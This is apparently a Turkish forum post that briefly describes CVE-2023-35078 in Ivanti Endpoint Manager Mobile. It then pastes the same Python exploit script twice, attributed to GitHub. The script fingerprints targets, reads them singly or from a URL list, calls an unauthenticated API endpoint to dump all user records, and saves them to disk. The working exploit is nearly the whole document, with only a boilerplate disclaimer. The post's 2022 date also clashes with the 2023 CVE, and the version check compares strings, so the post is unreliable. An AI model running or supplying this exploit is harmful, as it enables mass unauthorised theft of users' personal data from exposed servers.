- 14 Kas 2022
- 116
- 44
Merhaba.Bir API exploitiyle karşınıza gelmiş bulunuyorum.Bahsedeceğimiz exploit önceden MobileIron Core olarak da bilinen İvanti Endpoint Manager Mobile'da CVE-2023-35078 Exploit'i keşfedildi.Bu güvenlik açığı, desteklenen tüm sürümleri etkiler – Sürüm 11.4, 11.10, 11.9 ve 11.8 sürümlerini etkiler. Daha eski sürümler/sürümler de risk altındadır. Bu güvenlik açığı, yetkisiz, uzak (internete açık) bir kişinin potansiyel olarak kullanıcıların kişisel olarak tanımlanabilir bilgilerine erişmesine ve sunucuda sınırlı değişiklikler yapmasına olanak tanır. Şimdi ise kodları vereceğim.(githubdan alıntıdır.)
Python temellidir.
import requests
import sys
import json
import argparse
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
print("""
#########################################################
# #
# CVE-2023-35078 #
# Remote Unauthenticated API Access Vulnerability #
# Exploit PoC #
# #
#########################################################
[+] Description:
This script demonstrates an ethical Proof of Concept (PoC) for CVE-2023-35078 - Remote Unauthenticated API Access Vulnerability
The vulnerability allows unauthorized access to sensitive data through an insecure API endpoint.
nvd.nist.gov
[+] Disclaimer:
This script is for educational and ethical purposes only. It should only be used with explicit permission from the system owner and for legitimate security testing.
[+] Usage:
python cve_2023_35078_poc.py -u http://
python cve_2023_35078_poc.py -f urls.txt
[+] Author:
Vaishno Chaitanya (vchan-in - Overview)
""")
def check_ivanti_mobileiron_version(url):
# Check if the target is vulnerable
# Checking version from the HTML <link href="https://[target]/mifs/css/ui.login.css?11.2" rel="stylesheet" type="text/css" />
# Get the HTML
try:
r = requests.get(url, verify=False)
if r.status_code == 200:
# Get the version from the HTML
version_start = r.text.find("ui.login.css?")
if version_start != -1:
version_end = r.text.find('"', version_start)
version = r.text[version_start + len("ui.login.css?"):version_end]
print(f"[*] Target version: {version}")
if version <= "11.4":
print(f"[+] Target is vulnerable! {url}")
return True
else:
print(f"[-] Target is not vulnerable! {url}")
return False
else:
print(f"[-] Target is not vulnerable! {url}")
else:
print(f"[-] Target is not vulnerable! {url}")
except Exception as e:
print(f"[-] Error occurred: {str(e)}")
def get_users(url):
vuln_url = url + "/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"
print(f"[*] Exploiting the target... {url}")
try:
r = requests.get(vuln_url, verify=False)
if r.status_code == 200:
print("[+] Extracting Data:")
print(f"[*] Dumping all users from {vuln_url}")
# Save JSON response to a file with 'utf-8' encoding
# Create a file name with the target URL
filename = url.split("//")[1].split("/")[0] + ".json"
with open(filename, "w", encoding="utf-8") as f:
f.write(r.text)
print("[+] Data saved to file: " + filename)
print("[+] Vulnerability Exploited Successfully!")
print("")
else:
print("[-] Exploit failed. The target is not vulnerable.")
except Exception as e:
print(f"[-] Error occurred: {str(e)}")
def main():
parser = argparse.ArgumentParser(description='CVE-2023-35078 - Remote Unauthenticated API Access Vulnerability Exploit POC')
parser.add_argument('-u', '--url', help='URL to exploit', required=False)
parser.add_argument('-f', '--file', help='File containing URLs', required=False) # To check multiple URLs.
args = parser.parse_args()
banner()
if args.file:
print("[*] Reading URLs from file...")
with open(args.file, "r") as f:
urls = f.readlines()
for url in urls:
try:
# ignore empty lines
if url == "\n":
continue
url = url.strip()
print(f"[*] Target: {url}")
is_vulnerable = check_ivanti_mobileiron_version(url)
if is_vulnerable:
get_users(url)
except Exception as e:
continue
elif args.url:
print(f"[*] Target: {args.url}")
is_vulnerable = check_ivanti_mobileiron_version(args.url)
if is_vulnerable:
get_users(args.url)
if __name__ == "__main__":
main()
Python temellidir.
import requests
import sys
import json
import argparse
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
print("""
#########################################################
# #
# CVE-2023-35078 #
# Remote Unauthenticated API Access Vulnerability #
# Exploit PoC #
# #
#########################################################
[+] Description:
This script demonstrates an ethical Proof of Concept (PoC) for CVE-2023-35078 - Remote Unauthenticated API Access Vulnerability
The vulnerability allows unauthorized access to sensitive data through an insecure API endpoint.
NVD - CVE-2023-35078
nvd.nist.gov
[+] Disclaimer:
This script is for educational and ethical purposes only. It should only be used with explicit permission from the system owner and for legitimate security testing.
[+] Usage:
python cve_2023_35078_poc.py -u http://
python cve_2023_35078_poc.py -f urls.txt
[+] Author:
Vaishno Chaitanya (vchan-in - Overview)
""")
def check_ivanti_mobileiron_version(url):
# Check if the target is vulnerable
# Checking version from the HTML <link href="https://[target]/mifs/css/ui.login.css?11.2" rel="stylesheet" type="text/css" />
# Get the HTML
try:
r = requests.get(url, verify=False)
if r.status_code == 200:
# Get the version from the HTML
version_start = r.text.find("ui.login.css?")
if version_start != -1:
version_end = r.text.find('"', version_start)
version = r.text[version_start + len("ui.login.css?"):version_end]
print(f"[*] Target version: {version}")
if version <= "11.4":
print(f"[+] Target is vulnerable! {url}")
return True
else:
print(f"[-] Target is not vulnerable! {url}")
return False
else:
print(f"[-] Target is not vulnerable! {url}")
else:
print(f"[-] Target is not vulnerable! {url}")
except Exception as e:
print(f"[-] Error occurred: {str(e)}")
def get_users(url):
vuln_url = url + "/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"
print(f"[*] Exploiting the target... {url}")
try:
r = requests.get(vuln_url, verify=False)
if r.status_code == 200:
print("[+] Extracting Data:")
print(f"[*] Dumping all users from {vuln_url}")
# Save JSON response to a file with 'utf-8' encoding
# Create a file name with the target URL
filename = url.split("//")[1].split("/")[0] + ".json"
with open(filename, "w", encoding="utf-8") as f:
f.write(r.text)
print("[+] Data saved to file: " + filename)
print("[+] Vulnerability Exploited Successfully!")
print("")
else:
print("[-] Exploit failed. The target is not vulnerable.")
except Exception as e:
print(f"[-] Error occurred: {str(e)}")
def main():
parser = argparse.ArgumentParser(description='CVE-2023-35078 - Remote Unauthenticated API Access Vulnerability Exploit POC')
parser.add_argument('-u', '--url', help='URL to exploit', required=False)
parser.add_argument('-f', '--file', help='File containing URLs', required=False) # To check multiple URLs.
args = parser.parse_args()
banner()
if args.file:
print("[*] Reading URLs from file...")
with open(args.file, "r") as f:
urls = f.readlines()
for url in urls:
try:
# ignore empty lines
if url == "\n":
continue
url = url.strip()
print(f"[*] Target: {url}")
is_vulnerable = check_ivanti_mobileiron_version(url)
if is_vulnerable:
get_users(url)
except Exception as e:
continue
elif args.url:
print(f"[*] Target: {args.url}")
is_vulnerable = check_ivanti_mobileiron_version(args.url)
if is_vulnerable:
get_users(args.url)
if __name__ == "__main__":
main()
